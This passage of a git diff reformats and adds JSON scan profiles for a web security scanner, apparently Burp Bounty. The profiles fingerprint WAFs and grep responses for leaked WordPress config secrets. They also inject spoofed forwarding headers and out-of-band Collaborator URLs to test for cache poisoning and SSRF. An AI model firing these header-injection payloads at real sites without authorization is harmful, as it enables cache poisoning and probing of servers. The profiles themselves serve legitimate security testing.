Gateway","true,Or,Cloudbric","true,Or,cloudflare","true,Or,__cfuid\u003d","true,Or,CloudfloorDNS","true,Or,cloudfront","true,Or,FORTIWAFSID","true,Or,hwclouds.com","true,Or,Incapsula","true,Or,KeyCDN","true,Or,AkamaiGHost","true,Or,PowerCDN","true,Or,X-Qiniu-CDN","true,Or,squid/","true,Or,Sucuri","true,Or,waf.tencent-cloud.com","true,Or,xVarnish-WAF","true,Or,WatchGuard","true,Or,WebKnight","true,Or,ZScaler","true,Or,X-Powered-By-360WZB","true,Or,ak_bmsc","true,Or,AkamaiGHost","true,Or,X-Powered-By-Anquanbao","true,Or,BNI__BARRACUDA_LB_COOKIE","true,Or,BNI_persistence","true,Or,BinarySec","true,Or,x-binarysec-via","true,Or,x-binarysec-nocache","true,Or,ChinaCache","true,Or,Server: ACE XML Gateway","true,Or,ns_af","true,Or,citrix_ns_id","true,Or,NSC_","true,Or,Cneonction","true,Or,Coection","true,Or,NS-CACHE","true,Or,X-client-ip","true,Or,pwcount","true,Or,cloudflare-nginx","true,Or,__cfduid","true,Or,cloudflare","true,Or,X-dotDefender","true,Or,BIG-IP-F5","true,Or,MRHSession","true,Or,BigIP","true,Or,BIG-IP","true,Or,BIGIP","true,Or,F5_ST","true,Or,F5_HT","true,Or,LastMRH_Session","true,Or,MRHSequence","true,Or,MRHSHint","true,Or,Set-Cookie: TS","true,Or,BIGipServer","true,Or,uRoamTestCookie","true,Or,MRHCId","true,Or,uRoamTestCookie","true,Or,MRHIntranetSession","true,Or,F5-TrafficShield","true,Or,fgd_icon","true,Or,FORTIWAFSID","true,Or,WODSESSION","true,Or,X-Backside-Transport","true,Or,X-CDN: Incapsula","true,Or,incap_ses","true,Or,Set-Cookie: visid","true,Or,Set-Cookie: AL","true,Or,Server: Mission Control Application Shield","true,Or,mod_security","true,Or,Mod_Security","true,Or,NOYB","true,Or,NCI__SessionId","true,Or,NSFocus","true,Or,PowerCDN","true,Or,profense","true,Or,safedog-flow-item","true,Or,Safedog","true,Or,st8id","true,Or,Secure Entry Server","true,Or,WT263CDN","true,Or,ZENEDGE","true,Or,Served-By-Zenedge"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"WAF Found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"WAF Found\n\nCheck the results against https://github.com/0xInfection/Awesome-WAF","RemediationDetail":"WAF Found","IssueBackground":"WAF Found","RemediationBackground":"WAF Found","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "WAF_Found", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,Cloudflare", + "true,Or,Imperva", + "true,Or,NetScaler", + "true,Or,wzws-waf-cgi", + "true,Or,X-Powered-By-360WZB", + "true,Or,aeSecure", + "true,Or,AL-SESS", + "true,Or,aliyun", + "true,Or,Anquanbao", + "true,Or,WZWS-RAY", + "true,Or,ArvanCloud", + "true,Or,ASPA-Cache-Status", + "true,Or,X-ASPNET-Version", + "true,Or,cz_astra_csrf_cookie", + "true,Or,awselb/2.0", + "true,Or,Yunjiasu", + "true,Or,barracuda_", + "true,Or,barra_counter_session", + "true,Or,BinarySec", + "true,Or,BigIP", + "true,Or,BlockDos.net", + "true,Or,BDWAF", + "true,Or,CdnNsWAF", + "true,Or,ChinaCache", + "true,Or,ACE XML Gateway", + "true,Or,Cloudbric", + "true,Or,cloudflare", + "true,Or,__cfuid\u003d", + "true,Or,CloudfloorDNS", + "true,Or,cloudfront", + "true,Or,FORTIWAFSID", + "true,Or,hwclouds.com", + "true,Or,Incapsula", + "true,Or,KeyCDN", + "true,Or,AkamaiGHost", + "true,Or,PowerCDN", + "true,Or,X-Qiniu-CDN", + "true,Or,squid/", + "true,Or,Sucuri", + "true,Or,waf.tencent-cloud.com", + "true,Or,xVarnish-WAF", + "true,Or,WatchGuard", + "true,Or,WebKnight", + "true,Or,ZScaler", + "true,Or,X-Powered-By-360WZB", + "true,Or,ak_bmsc", + "true,Or,AkamaiGHost", + "true,Or,X-Powered-By-Anquanbao", + "true,Or,BNI__BARRACUDA_LB_COOKIE", + "true,Or,BNI_persistence", + "true,Or,BinarySec", + "true,Or,x-binarysec-via", + "true,Or,x-binarysec-nocache", + "true,Or,ChinaCache", + "true,Or,Server: ACE XML Gateway", + "true,Or,ns_af", + "true,Or,citrix_ns_id", + "true,Or,NSC_", + "true,Or,Cneonction", + "true,Or,Coection", + "true,Or,NS-CACHE", + "true,Or,X-client-ip", + "true,Or,pwcount", + "true,Or,cloudflare-nginx", + "true,Or,__cfduid", + "true,Or,cloudflare", + "true,Or,X-dotDefender", + "true,Or,BIG-IP-F5", + "true,Or,MRHSession", + "true,Or,BigIP", + "true,Or,BIG-IP", + "true,Or,BIGIP", + "true,Or,F5_ST", + "true,Or,F5_HT", + "true,Or,LastMRH_Session", + "true,Or,MRHSequence", + "true,Or,MRHSHint", + "true,Or,Set-Cookie: TS", + "true,Or,BIGipServer", + "true,Or,uRoamTestCookie", + "true,Or,MRHCId", + "true,Or,uRoamTestCookie", + "true,Or,MRHIntranetSession", + "true,Or,F5-TrafficShield", + "true,Or,fgd_icon", + "true,Or,FORTIWAFSID", + "true,Or,WODSESSION", + "true,Or,X-Backside-Transport", + "true,Or,X-CDN: Incapsula", + "true,Or,incap_ses", + "true,Or,Set-Cookie: visid", + "true,Or,Set-Cookie: AL", + "true,Or,Server: Mission Control Application Shield", + "true,Or,mod_security", + "true,Or,Mod_Security", + "true,Or,NOYB", + "true,Or,NCI__SessionId", + "true,Or,NSFocus", + "true,Or,PowerCDN", + "true,Or,profense", + "true,Or,safedog-flow-item", + "true,Or,Safedog", + "true,Or,st8id", + "true,Or,Secure Entry Server", + "true,Or,WT263CDN", + "true,Or,ZENEDGE", + "true,Or,Served-By-Zenedge" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "WAF Found", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "WAF Found\n\nCheck the results against https://github.com/0xInfection/Awesome-WAF", + "RemediationDetail": "WAF Found", + "IssueBackground": "WAF Found", + "RemediationBackground": "WAF Found", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/WP_Config.bb b/profiles/WP_Config.bb old mode 100644 new mode 100755 index 0b1d8d9..0a93762 --- a/profiles/WP_Config.bb +++ b/profiles/WP_Config.bb @@ -1 +1,59 @@ -[{"Name":"WP_Config","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,define(.{0,20})?(DB_CHARSET|NONCE_SALT|LOGGED_IN_SALT|AUTH_SALT|NONCE_KEY|DB_HOST|DB_PASSWORD|AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|DB_NAME|DB_USER)(.{0,20})?[\u0027|\"].{10,120}[\u0027|\"]"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"WP Config","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "WP_Config", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,define(.{0,20})?(DB_CHARSET|NONCE_SALT|LOGGED_IN_SALT|AUTH_SALT|NONCE_KEY|DB_HOST|DB_PASSWORD|AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|DB_NAME|DB_USER)(.{0,20})?[\u0027|\"].{10,120}[\u0027|\"]" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "WP Config", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/WebCachePoisoning.bb b/profiles/WebCachePoisoning.bb index 6a9af3d..3553161 100755 --- a/profiles/WebCachePoisoning.bb +++ b/profiles/WebCachePoisoning.bb @@ -1 +1,134 @@ -[{"Name":"WebCachePoisoning","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["STRINGFORREQUEST"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,TOKEN1337"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Web-Cache-Poisoning","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Web Cache poisoning with payload: \u003cbr\u003e\u003cpayload\u003e\n\n\u003cbr\u003e\u003cbr\u003eBy James Kettle:\u003cbr\u003ehttps://portswigger.net/blog/practical-web-cache-poisoning","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"","replace":"X-Forwarded-For: TOKEN1337","regex":"String"},{"type":"Request","match":"","replace":"X-Host: TOKEN1337","regex":"String"},{"type":"Request","match":"","replace":"X-Forwarded-Server: TOKEN1337","regex":"String"},{"type":"Request","match":"","replace":"X-Forwarded-Scheme: TOKEN1337","regex":"String"},{"type":"Request","match":"","replace":"X-Original-URL: TOKEN1337","regex":"String"},{"type":"Request","match":"","replace":"X-Rewrite-URL: TOKEN1337","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "WebCachePoisoning", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,STRINGFORREQUEST" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,TOKEN1337" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 3, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Web-Cache-Poisoning", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "Web Cache poisoning with payload: \u003cbr\u003e\u003cpayload\u003e\n\n\u003cbr\u003e\u003cbr\u003eBy James Kettle:\u003cbr\u003ehttps://portswigger.net/blog/practical-web-cache-poisoning", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Request", + "match": "", + "replace": "X-Forwarded-For: TOKEN1337", + "regex": "String" + }, + { + "type": "Request", + "match": "", + "replace": "X-Host: TOKEN1337", + "regex": "String" + }, + { + "type": "Request", + "match": "", + "replace": "X-Forwarded-Server: TOKEN1337", + "regex": "String" + }, + { + "type": "Request", + "match": "", + "replace": "X-Forwarded-Scheme: TOKEN1337", + "regex": "String" + }, + { + "type": "Request", + "match": "", + "replace": "X-Original-URL: TOKEN1337", + "regex": "String" + }, + { + "type": "Request", + "match": "", + "replace": "X-Rewrite-URL: TOKEN1337", + "regex": "String" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/WeblogicServer-UDDI_Explorer.bb b/profiles/WeblogicServer-UDDI_Explorer.bb old mode 100644 new mode 100755 index 9103340..524c7a5 --- a/profiles/WeblogicServer-UDDI_Explorer.bb +++ b/profiles/WeblogicServer-UDDI_Explorer.bb @@ -1 +1,59 @@ -[{"Name":"WeblogicServer-UDDI_Explorer","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["/uddiexplorer/searchpublicregistries.jsp"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"WeblogicServer-UDDI Explorer","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"https://www.exploit-db.com/ghdb/4991","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "WeblogicServer-UDDI_Explorer", + "Name": "", + "Enabled": true, + "Scanner": 3, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,All Request,Value,/uddiexplorer/searchpublicregistries.jsp" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "WeblogicServer-UDDI Explorer", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "https://www.exploit-db.com/ghdb/4991", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Wordpress-SensitiveDirectories.bb b/profiles/Wordpress-SensitiveDirectories.bb new file mode 100755 index 0000000..6f42eda --- /dev/null +++ b/profiles/Wordpress-SensitiveDirectories.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "Wordpress-SensitiveDirectories", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,/wp-content/uploads/wp-backup-plus/" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Wordpress-SensitiveDirectories", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Wordpress Sensitive Directories:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/5032/", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/X-Content-Type-Options.bb b/profiles/X-Content-Type-Options.bb new file mode 100755 index 0000000..4d2bf31 --- /dev/null +++ b/profiles/X-Content-Type-Options.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "X-Content-Type-Options", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,X-Content-Type-Options: nosniff" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": true, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 1, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "X-Content-Type-Options", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Security Header \"X-Content-Type-Options\" not present in response.", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/X-Frame-Options.bb b/profiles/X-Frame-Options.bb new file mode 100755 index 0000000..2e51dee --- /dev/null +++ b/profiles/X-Frame-Options.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "X-Frame-Options", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,X-Frame-Options" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": true, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 1, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "X-Frame-Options", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Security Header \"X-Frame-Options\" not present in response.", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/X-Headers-Collaborator-combined.bb b/profiles/X-Headers-Collaborator-combined.bb index 1d7ffe9..7cdcb1c 100755 --- a/profiles/X-Headers-Collaborator-combined.bb +++ b/profiles/X-Headers-Collaborator-combined.bb @@ -1 +1,159 @@ -[{"Name":"X-Headers-Collaborator-combined","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["http://{BC}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["Collaborator","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":0,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"X-Headers-Collaborator-combined","IssueSeverity":"Medium","IssueConfidence":"Firm","IssueDetail":"X-Headers-Collaborator-combined","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"X-Forwarded-For:.*","replace":"X-Forwarded-For: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Host:.*","replace":"X-Host: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Forwarded-Server:*","replace":"X-Forwarded-Server: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Forwarded-Scheme:.*","replace":"X-Forwarded-Scheme: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Original-URL:.*","replace":"X-Original-URL: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Rewrite-URL:.*","replace":"X-Rewrite-URL: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"Forwarded: for\u003d.*","replace":"Forwarded: for\u003d {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"Origin:.*","replace":"Origin: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"Referer:.*","replace":"Referer: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Forwarded-Host:.*","replace":"X-Forwarded-Host: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Forwarded-Proto:.*","replace":"X-Forwarded-Proto: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-ProxyUser-Ip:.*","replace":"X-ProxyUser-Ip: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Wap-Profile:.*","replace":"X-Wap-Profile: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"Client-IP:.*","replace":"Client-IP: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"True-Client-IP:.*","replace":"True-Client-IP: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"Cluster-Client-IP:.*","replace":"Cluster-Client-IP: {PAYLOAD}","regex":"Regex"}],"VariationAttributes":[],"InsertionPointType":[32],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "X-Headers-Collaborator-combined", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@Sy3Omda", + "Payloads": [ + "true,http://{BC}" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [], + "Tags": [ + "Collaborator", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 0, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "X-Headers-Collaborator-combined", + "IssueSeverity": "Medium", + "IssueConfidence": "Firm", + "IssueDetail": "X-Headers-Collaborator-combined", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Request", + "match": "X-Forwarded-For:.*", + "replace": "X-Forwarded-For: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "X-Host:.*", + "replace": "X-Host: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "X-Forwarded-Server:*", + "replace": "X-Forwarded-Server: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "X-Forwarded-Scheme:.*", + "replace": "X-Forwarded-Scheme: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "X-Original-URL:.*", + "replace": "X-Original-URL: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "X-Rewrite-URL:.*", + "replace": "X-Rewrite-URL: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "Forwarded: for\u003d.*", + "replace": "Forwarded: for\u003d {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "Origin:.*", + "replace": "Origin: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "Referer:.*", + "replace": "Referer: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "X-Forwarded-Host:.*", + "replace": "X-Forwarded-Host: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "X-Forwarded-Proto:.*", + "replace": "X-Forwarded-Proto: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "X-ProxyUser-Ip:.*", + "replace": "X-ProxyUser-Ip: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "X-Wap-Profile:.*", + "replace": "X-Wap-Profile: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "Client-IP:.*", + "replace": "Client-IP: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "True-Client-IP:.*", + "replace": "True-Client-IP: {PAYLOAD}", + "regex": "Regex" + }, + { + "type": "Request", + "match": "Cluster-Client-IP:.*", + "replace": "Cluster-Client-IP: {PAYLOAD}", + "regex": "Regex" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 32 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/X-Headers-Collaborator.bb b/profiles/X-Headers-Collaborator.bb index 4caa0a6..f0163b7 100755 --- a/profiles/X-Headers-Collaborator.bb +++ b/profiles/X-Headers-Collaborator.bb @@ -1 +1,133 @@ -[{"Name":"X-Headers-Collaborator","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["http://{BC}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["Collaborator","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":1,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"X-Headers-Collaborator","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"X-Headers-Collaborator","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"","replace":"X-Forwarded-For: 